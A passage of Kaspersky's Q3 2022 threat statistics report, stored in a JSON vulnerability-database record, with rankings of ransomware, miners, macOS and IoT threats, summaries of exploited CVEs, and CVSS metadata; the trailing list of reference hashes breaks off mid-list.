More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which took sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few 
Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. 
A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). 
These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. 
Attempts to exploit network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows remote exploitation of a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities, which use a similar exploitation technique and were closed earlier. 
Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese 
were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. 
Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. 
In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by the North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. 
July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," took the top place for the second quarter in a row. This application displays fake system issue messages and prompts the user to buy the full version to fix them. 
Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | 
Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. 
Russia scored 16.60% in this ranking.", "published": "2022-11-18T08:10:34", "modified": "2022-11-18T08:10:34", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "reporter": "AMR", "references": [], "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "immutableFields": [], 
"lastseen": "2022-11-30T12:08:22", "viewCount": 21, "enchantments": {"dependencies": {"references": [{"type": "ibm", "idList": [
"4E7048D2949BF25810D29EF0126BEB63CEE9FB2EFA940D8D15F1A2EA9579215D", "4E77D6807CCB5F39F0079A9612FD44F47C18AEBAF1D9AA7EBBCB816C3FD025B9", "4EADDF94DBE666E2A4821F37D1326BE41E94E92E6E6B1A8834D7F3C47C803887", "4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "4FB8B888437D1D3BA8267655720E593D70AA3798247EDD900F18FB420753B17B", "4FBB5FAC2DC58E004CD52875DF4CDC0625DBFB20A2AD61A597C719C2C2B0ECAE", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "5386FE1271B599B35C07E4CE74602B34BFA6835496174DF0B19F0F6517DF425D", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "548C926066F6AD2176268ED770911E39A8F8EF2D79582E0A4D8DDE7F34549084", "558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "57C8014122573615025590EC2ECB0090790833D51A381D781A55C4F43EDA278D", "5815FB6A93B31EE44428DCA7206EFD79ECDE693494B2D5F28EA2CF1909915C77", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "5933EF8E3015054BC951DB682E9526300B741E8D2A0F7151692088DF8A1C8A68", "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "5BB3B8EF53C6357C441C8592F64A284C30E9C1D6F5379087C40684A770A870AA", "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "5C4285711D841C9680531DE8ADF4E9F871797CE3D4CE7073D4D1B7D69166DABE", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "5D661EA5B801079F3B7AF6D31A8566154E3150C1E3398EC1CFA32E9398BF38D3", "5D979AFFDF974F2910D0CF8FD15D323A264B0745C0ACF5B78092630C5EB271CE", 
"5DC028B7AB8CCCA9FD3F109B69D7F7AEBDC718A32C0EC71E5693C99FFB06466E", "5E0D2EC541C3D2FE5413DA829783950147FE05FA866060FB6B6B557BC4E00A16", "5E46685CCFDAFEF52C3BC0BE649F5DFE9485392CF7A7733CC64B02CFBA707DF4", "5EB805FBA32A419246DDD86FFCA6C34246C092FCBCD8608B3ABC4B0A77FFDAA2", "5ED570DDC2DC18EDBE3A6F896450F75892C392B6E12D967BD6C8F6E5EB0809E5", "5EE7E4E97581573D0B40454E7851D662668050B8C7587DA918FD85D38B92C2A2", "5F1A8E5DEF8C5B0BD8A337785BC9EC92521E4E1FC191BC80CFB2E92B4BEB7686", "5F247DF8011234E4C8E9F5DA1233AD5131F7718B99D13FA0E448AB8545E5E6F8", "5F24F58173ED799EACD7F7DC971D2ECB62B80971453D92D5DB9CA708526DE3A8", "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "60679F1EB565A827FBFDD72C9C325755586FDA1F0AC78877A6590DED78230E66", "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "62D22CE7464E30931544D86043D72A241CA4A2ED1A6F28AB59EEDEFFCBBFFAAB", "6305882E456CC7111E361249970AB42E196A23084AAFDDE2E82B0694295074BC", "65B30A5B63DE43E789127C5F5AD2977C7194142636581876B7BA2AE224B6420B", "6631C04F89A8D2ED4BC1256E62C3AB820EB5DE675CE6766AA9AFAB238EA92F40", "6655F0CA454D34B530E468D672328E7DE915E373D5DF7A2E41376F7E2B588F5F", "666E4FBDA68F1376E7E84944B116ED00320BF80162EF68755AD1CD31AE358231", "6741052F2A7BCCF76F84825C9FE706D98BCF279A0C055A783796DC802C323E13", "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "6758FD589A76487DB6421ACF317F7E42F52C2C62336F671B43C2B523483BF57E", "67A6DAD4F7DB5EFA4D058E5FA0886E6D1185C31EE7AFA1B194E5CA4D0F4A3F5C", "67B2FFD11F790787A36E0394080502A01EE907D975E33ADFF6E931A0E15B05F7", "67D7A2AD6D196C643D91F066E834B1EB9853338990881AE1012D2B5186629622", "67EEDC4E808A4DC3E092C0FD2F6DFB5714B1E7F2E2ECD7CE2F8B2F65F2D2B26F", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6920277579A35875812264472A148A4383E98310C21147950644BE922AD17700", "6A43E45FE98A49A0127D4FD81A7F70BC513609043DDA830926C4CD80286B1A17", 
